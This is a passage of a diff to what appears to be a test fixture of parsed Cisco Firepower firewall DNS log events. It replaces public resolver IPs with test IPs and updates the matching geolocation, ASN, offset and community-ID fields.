-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -517,9 +522,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 2766,
+        "log.offset": 2786,
         "network.application": "dns client",
-        "network.community_id": "1:1SqTqSDG5492OiLhDUMOi+wnDYs=",
+        "network.community_id": "1:TPjownqp6q96Ph6ZPCNuoX0B3HM=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -536,7 +541,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -571,7 +576,7 @@
         "cisco.ftd.security.dns_query": "elastic.co",
         "cisco.ftd.security.dns_record_type": "the canonical name for an alias",
         "cisco.ftd.security.dns_ttl": "658",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -588,16 +593,17 @@
         "cisco.ftd.security.src_port": "59714",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 166,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "elastic.co",
@@ -613,7 +619,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -627,9 +633,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 3449,
+        "log.offset": 3474,
         "network.application": "dns client",
-        "network.community_id": "1:eXdHUOdHk5dGXusvMEGcWj9ywPM=",
+        "network.community_id": "1:Zs97Yt3odnRGMC6czVZHiK2gaFs=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -646,7 +652,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -683,7 +689,7 @@
         "cisco.ftd.security.dns_record_type": "mail exchange",
         "cisco.ftd.security.dns_response_type": "Non-Existent Domain",
         "cisco.ftd.security.dns_ttl": "299",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -701,16 +707,17 @@
         "cisco.ftd.security.src_port": "55105",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 199,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "elastic.co",
@@ -726,7 +733,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -740,9 +747,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 4125,
+        "log.offset": 4155,
         "network.application": "dns client",
-        "network.community_id": "1:rjxS8IH4jqdHiflcG+1txqEFP1M=",
+        "network.community_id": "1:udDTvAepVn3p8B+5mKdI4G/Ijb0=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -759,7 +766,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -794,7 +801,7 @@
         "cisco.ftd.security.dns_query": "elastic.co",
         "cisco.ftd.security.dns_record_type": "an authoritative name server",
         "cisco.ftd.security.dns_ttl": "21599",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -811,16 +818,17 @@
         "cisco.ftd.security.src_port": "57141",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 221,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "elastic.co",
@@ -836,7 +844,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -850,9 +858,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 4878,
+        "log.offset": 4913,
         "network.application": "dns client",
-        "network.community_id": "1:R1FcZHFFvO0mHFfeVXH/CwTGCmU=",
+        "network.community_id": "1:lQqpyFbf8OB4k/v/Xp3qTDb5NiQ=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -869,7 +877,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -905,7 +913,7 @@
         "cisco.ftd.security.dns_record_type": "marks the start of a zone of authority",
         "cisco.ftd.security.dns_response_type": "Server Failure",
         "cisco.ftd.security.dns_ttl": "899",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -922,16 +930,17 @@
         "cisco.ftd.security.src_port": "47260",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 166,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "elastic.co",
@@ -947,7 +956,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -961,9 +970,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 5553,
+        "log.offset": 5593,
         "network.application": "dns client",
-        "network.community_id": "1:0YJqKZXX7VN9W1Gx6txd8TFELHM=",
+        "network.community_id": "1:t64M0Z/m2pBWy+a226Z/H+Vnrjc=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -980,7 +989,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -1016,7 +1025,7 @@
         "cisco.ftd.security.dns_query": "elastic.co",
         "cisco.ftd.security.dns_record_type": "text strings",
         "cisco.ftd.security.dns_ttl": "299",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -1034,16 +1043,17 @@
         "cisco.ftd.security.src_port": "58082",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 722,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "elastic.co",
@@ -1059,7 +1069,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -1073,9 +1083,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 6269,
+        "log.offset": 6314,
         "network.application": "dns client",
-        "network.community_id": "1:jVTdIEwjG0Eb77jGrcDygrNq9jg=",
+        "network.community_id": "1:7tN8tGLiJNoFT89lpvR+QyNOZBM=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -1092,7 +1102,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -1145,17 +1155,7 @@
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
         "destination.address": "205.251.196.144",
-        "destination.as.number": 16509,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 75,
-        "destination.geo.city_name": "Seattle",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 47.6109,
-        "destination.geo.location.lon": -122.3303,
-        "destination.geo.region_iso_code": "US-WA",
-        "destination.geo.region_name": "Washington",
         "destination.ip": "205.251.196.144",
         "destination.packets": 1,
         "destination.port": 53,
@@ -1186,7 +1186,7 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 6983,
+        "log.offset": 7033,
         "network.application": "dns client",
         "network.community_id": "1:ZllIE5YNb+12oKtX/tP/gysnSuE=",
         "network.iana_number": 17,
@@ -1238,7 +1238,7 @@
         "cisco.ftd.security.client": "DNS client",
         "cisco.ftd.security.connection_duration": "0",
         "cisco.ftd.security.dns_response_type": "Server Failure",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -1255,16 +1255,17 @@
         "cisco.ftd.security.src_port": "39541",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 313,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 4,
         "destination.port": 53,
         "dns.response_code": "SERVFAIL",
@@ -1278,7 +1279,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -1292,9 +1293,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 7672,
+        "log.offset": 7722,
         "network.application": "dns client",
-        "network.community_id": "1:oGBN4YWsAncmtqDJ1onnQNRAEnw=",
+        "network.community_id": "1:G30mjgNJHAAxjeZIH5X2K011CII=",
         "network.iana_number": 6,
         "network.protocol": "dns",
         "network.transport": "tcp",
@@ -1311,7 +1312,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -1347,7 +1348,7 @@
         "cisco.ftd.security.dns_record_type": "a host address",
         "cisco.ftd.security.dns_response_type": "Non-Existent Domain",
         "cisco.ftd.security.dns_ttl": "900",
-        "cisco.ftd.security.dst_ip": "9.9.9.9",
+        "cisco.ftd.security.dst_ip": "1.128.3.4",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -1364,16 +1365,11 @@
         "cisco.ftd.security.src_port": "41672",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "9.9.9.9",
-        "destination.as.number": 19281,
-        "destination.as.organization.name": "Quad9",
+        "destination.address": "1.128.3.4",
+        "destination.as.number": 1221,
+        "destination.as.organization.name": "Telstra Pty Ltd",
         "destination.bytes": 180,
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "FR",
-        "destination.geo.country_name": "France",
-        "destination.geo.location.lat": 48.8582,
-        "destination.geo.location.lon": 2.3387,
-        "destination.ip": "9.9.9.9",
+        "destination.ip": "1.128.3.4",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "laskdfjlaksdf.elastic.co",
@@ -1389,7 +1385,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 1.128.3.4, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-26T23:11:03.000Z",
@@ -1403,9 +1399,9 @@
         "host.hostname": "siem-ftd",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 8298,
+        "log.offset": 8353,
         "network.application": "dns client",
-        "network.community_id": "1:+1CCqUYePM8bXFUXWVeSSjL3g58=",
+        "network.community_id": "1:iApagbBNHbGxbhy6gmkfzWZgbk0=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -1421,8 +1417,8 @@
             "siem-ftd"
         ],
         "related.ip": [
-            "10.0.1.20",
-            "9.9.9.9"
+            "1.128.3.4",
+            "10.0.1.20"
         ],
         "related.user": [
             "No Authentication Required"
@@ -1457,7 +1453,7 @@
         "cisco.ftd.security.dns_query": "ns-1168.awsdns-18.org",
         "cisco.ftd.security.dns_record_type": "a host address",
         "cisco.ftd.security.dns_ttl": "31694",
-        "cisco.ftd.security.dst_ip": "9.9.9.9",
+        "cisco.ftd.security.dst_ip": "1.128.3.4",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -1474,16 +1470,11 @@
         "cisco.ftd.security.src_port": "59577",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "9.9.9.9",
-        "destination.as.number": 19281,
-        "destination.as.organization.name": "Quad9",
+        "destination.address": "1.128.3.4",
+        "destination.as.number": 1221,
+        "destination.as.organization.name": "Telstra Pty Ltd",
         "destination.bytes": 108,
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "FR",
-        "destination.geo.country_name": "France",
-        "destination.geo.location.lat": 48.8582,
-        "destination.geo.location.lon": 2.3387,
-        "destination.ip": "9.9.9.9",
+        "destination.ip": "1.128.3.4",
         "destination.packets": 1,
         "destination.port": 53,
         "dns.question.name": "ns-1168.awsdns-18.org",
@@ -1499,7 +1490,7 @@
         "event.end": "2019-08-26T21:11:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
